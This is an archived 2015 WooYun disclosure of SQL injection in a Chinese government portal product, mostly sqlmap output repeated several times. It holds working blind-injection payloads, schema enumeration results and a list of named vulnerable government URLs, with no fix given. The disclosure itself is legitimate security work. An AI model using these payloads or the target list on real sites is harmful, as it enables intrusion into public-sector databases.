某在用政务系统SQL注入 | wooyun-2015-0111283| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111283

漏洞标题：某在用政务系统SQL注入

漏洞作者：路人甲

提交时间：2015-05-04 16:42

修复时间：2015-08-06 18:16

公开时间：2015-08-06 18:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-04：细节已通知厂商并且等待厂商处理中
2015-05-08：厂商已经确认，细节仅向厂商公开
2015-05-11：细节向第三方安全合作伙伴开放
2015-07-02：细节向核心白帽子及相关领域专家公开
2015-07-12：细节向普通白帽子公开
2015-07-22：细节向实习白帽子公开
2015-08-06：细节向公众公开

简要描述：

一款用户量很大的政务系统

详细说明：

厂商：四川易极天成信息技术有限公司用户量极大，这次总不会小厂商了吧。。搜索了一下，也没人提交。。

问题出现在搜索这块infotitle参数存在 boolean-based blind与time-based blind型注入

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11

Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS
[15:03:15] [INFO] retrieved: HR
[15:04:10] [INFO] retrieved: IX
[15:05:15] [INFO] retrieved: MDSYS
[15:07:25] [INFO] retrieved: OE
[15:08:32] [INFO] retrieved: OLAPSYS

#2：

http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111

Place: GET
Parameter: infotitle
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111%' AND 9973=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(98)||CHR(87)||CHR(69),5) AND '%'='
---
[15:29:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:29:24] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:29:24] [INFO] fetching database (schema) names
[15:29:24] [INFO] fetching number of databases
[15:29:24] [INFO] retrieved: 
[15:29:24] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
2

#3：

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11

sqlmap identified the following injection points with a total of 346 HTTP(s) requests:
---
Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS

#4：

http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11

Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infotitle=11%' AND 1983=1983 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: infotitle=11%' AND 5133=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(65)||CHR(117)||CHR(112),5) AND '%'='
---
[15:09:58] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:09:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:09:58] [INFO] fetching database (schema) names
[15:09:58] [INFO] fetching number of databases
[15:09:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:09:58] [INFO] retrieved: 24
[15:10:08] [INFO] retrieved: APEX_030200
[15:11:43] [INFO] retrieved: APPQOSSYS
[15:13:00] [INFO] retrieved: CTXSYS
[15:13:53] [INFO] retrieved: DBSNMP
[15:14:47] [INFO] retrieved: EGSS1
[15:15:33] [INFO] retrieved: EXFSYS
[15:16:26] [INFO] retrieved: FLOWS_FILES
[15:17:57] [INFO] retrieved: HR
[15:18:19] [INFO] retrieved: IX
[15:18:42] [INFO] retrieved: MDSYS
[15:19:27] [INFO] retrieved: OE
[15:19:49] [INFO] retrieved: OLAPSYS
[15:20:50] [INFO] retrieved: ORDDATA
[15:21:50] [INFO] retrieved: ORDSYS
[15:22:43] [INFO] retrieved: OUTLN
[15:23:29] [INFO] retrieved: OWBSYS
[15:24:21] [INFO] retrieved: PM
[15:24:44] [INFO] retrieved: SCOTT
[15:25:32] [INFO] retrieved: SH
[15:25:55] [INFO] retrieved: SYS
[15:26:26] [INFO] retrieved: SYSMAN
[15:27:18] [INFO] retrieved: SYSTEM
[15:28:11] [INFO] retrieved: WMSYS
[15:28:56] [INFO] retrieved: XDB
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EGSS1
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[15:29:26] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ldj.luzhou.gov.cn'

#5：

http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11

Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 9941=9941 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 8273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(74)||CHR(100)||CHR(79),5) AND '%'='
---
[15:03:18] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:03:18] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:03:18] [INFO] fetching database (schema) names
[15:03:18] [INFO] fetching number of databases
[15:03:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:03:18] [INFO] retrieved: 22
[15:03:54] [INFO] retrieved: CTXSYS
[15:06:19] [INFO] retrieved: DBSNMP
[15:09:06] [INFO] retrieved: DMSYS
[15:11:10] [INFO] retrieved: EGSS_USER
[15:15:31] [INFO] retrieved: EXFSYS
[15:18:35] [INFO] retrieved: HJEGSS
[15:21:43] [INFO] retrieved: HR

---------------------------------------------------------------
其他一些案例：

http://www.lzjyrd.gov.cn/template/v2/searchResult.jsp?infotitle=1
http://cuiping.gov.cn/template/hjbh/pagelist_search.jsp?infotitle=1
http://fsz.jiangyang.gov.cn/jyqsub8/template/jyq_fsz/pagelist_search.jsp?infotitle=1
http://www.lzhb.gov.cn/template/default/h_search.jsp?infotitle=1111
http://www.hjcom.gov.cn/template/hj_jingjixinxiju/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eacdda2780398&infotitle=1111
http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11
http://www.hjdaj.com/template/hjdaj/pagelist_search.jsp?fatherid=5c26e0783e83020b013e8c4bb2810441&infotitle=11
http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11
http://www.hjjsj.gov.cn/template/hjxzjj/pagelist_search.jsp?fatherid=5c26e0783fa445fb013fa93a42190254&infotitle=111
http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11
http://www.hjxblz.gov.cn/template/hjxblz/list_1.jsp?fatherid=5c26e0783ea435d3013ea5c27d6b002a&infotitle=11
http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111

漏洞证明：

厂商：四川易极天成信息技术有限公司用户量极大，这次总不会小厂商了吧。。搜索了一下，也没人提交。。

问题出现在搜索这块infotitle参数存在 boolean-based blind与time-based blind型注入

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11

Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS
[15:03:15] [INFO] retrieved: HR
[15:04:10] [INFO] retrieved: IX
[15:05:15] [INFO] retrieved: MDSYS
[15:07:25] [INFO] retrieved: OE
[15:08:32] [INFO] retrieved: OLAPSYS

#2：

http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111

Place: GET
Parameter: infotitle
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111%' AND 9973=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(98)||CHR(87)||CHR(69),5) AND '%'='
---
[15:29:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:29:24] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:29:24] [INFO] fetching database (schema) names
[15:29:24] [INFO] fetching number of databases
[15:29:24] [INFO] retrieved: 
[15:29:24] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
2

#3：

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11

sqlmap identified the following injection points with a total of 346 HTTP(s) requests:
---
Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS

#4：

http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11

Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infotitle=11%' AND 1983=1983 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: infotitle=11%' AND 5133=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(65)||CHR(117)||CHR(112),5) AND '%'='
---
[15:09:58] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:09:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:09:58] [INFO] fetching database (schema) names
[15:09:58] [INFO] fetching number of databases
[15:09:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:09:58] [INFO] retrieved: 24
[15:10:08] [INFO] retrieved: APEX_030200
[15:11:43] [INFO] retrieved: APPQOSSYS
[15:13:00] [INFO] retrieved: CTXSYS
[15:13:53] [INFO] retrieved: DBSNMP
[15:14:47] [INFO] retrieved: EGSS1
[15:15:33] [INFO] retrieved: EXFSYS
[15:16:26] [INFO] retrieved: FLOWS_FILES
[15:17:57] [INFO] retrieved: HR
[15:18:19] [INFO] retrieved: IX
[15:18:42] [INFO] retrieved: MDSYS
[15:19:27] [INFO] retrieved: OE
[15:19:49] [INFO] retrieved: OLAPSYS
[15:20:50] [INFO] retrieved: ORDDATA
[15:21:50] [INFO] retrieved: ORDSYS
[15:22:43] [INFO] retrieved: OUTLN
[15:23:29] [INFO] retrieved: OWBSYS
[15:24:21] [INFO] retrieved: PM
[15:24:44] [INFO] retrieved: SCOTT
[15:25:32] [INFO] retrieved: SH
[15:25:55] [INFO] retrieved: SYS
[15:26:26] [INFO] retrieved: SYSMAN
[15:27:18] [INFO] retrieved: SYSTEM
[15:28:11] [INFO] retrieved: WMSYS
[15:28:56] [INFO] retrieved: XDB
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EGSS1
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[15:29:26] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ldj.luzhou.gov.cn'

#5：

http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11

Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 9941=9941 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 8273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(74)||CHR(100)||CHR(79),5) AND '%'='
---
[15:03:18] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:03:18] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:03:18] [INFO] fetching database (schema) names
[15:03:18] [INFO] fetching number of databases
[15:03:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:03:18] [INFO] retrieved: 22
[15:03:54] [INFO] retrieved: CTXSYS
[15:06:19] [INFO] retrieved: DBSNMP
[15:09:06] [INFO] retrieved: DMSYS
[15:11:10] [INFO] retrieved: EGSS_USER
[15:15:31] [INFO] retrieved: EXFSYS
[15:18:35] [INFO] retrieved: HJEGSS
[15:21:43] [INFO] retrieved: HR

---------------------------------------------------------------
其他一些案例：

http://www.lzjyrd.gov.cn/template/v2/searchResult.jsp?infotitle=1
http://cuiping.gov.cn/template/hjbh/pagelist_search.jsp?infotitle=1
http://fsz.jiangyang.gov.cn/jyqsub8/template/jyq_fsz/pagelist_search.jsp?infotitle=1
http://www.lzhb.gov.cn/template/default/h_search.jsp?infotitle=1111
http://www.hjcom.gov.cn/template/hj_jingjixinxiju/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eacdda2780398&infotitle=1111
http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11
http://www.hjdaj.com/template/hjdaj/pagelist_search.jsp?fatherid=5c26e0783e83020b013e8c4bb2810441&infotitle=11
http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11
http://www.hjjsj.gov.cn/template/hjxzjj/pagelist_search.jsp?fatherid=5c26e0783fa445fb013fa93a42190254&infotitle=111
http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11
http://www.hjxblz.gov.cn/template/hjxblz/list_1.jsp?fatherid=5c26e0783ea435d3013ea5c27d6b002a&infotitle=11
http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111

修复方案：

。。。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-05-08 18:15

厂商回复：

CNVD未直接复现所述情况，已经转由CNCERT下发给四川分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111283

漏洞标题：某在用政务系统SQL注入

相关厂商：四川易极天成信息技术有限公司

漏洞作者：路人甲

提交时间：2015-05-04 16:42

修复时间：2015-08-06 18:16

公开时间：2015-08-06 18:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111283

漏洞标题：某在用政务系统SQL注入

相关厂商：四川易极天成信息技术有限公司

漏洞作者： 路人甲

提交时间：2015-05-04 16:42

修复时间：2015-08-06 18:16

公开时间：2015-08-06 18:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0111283"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云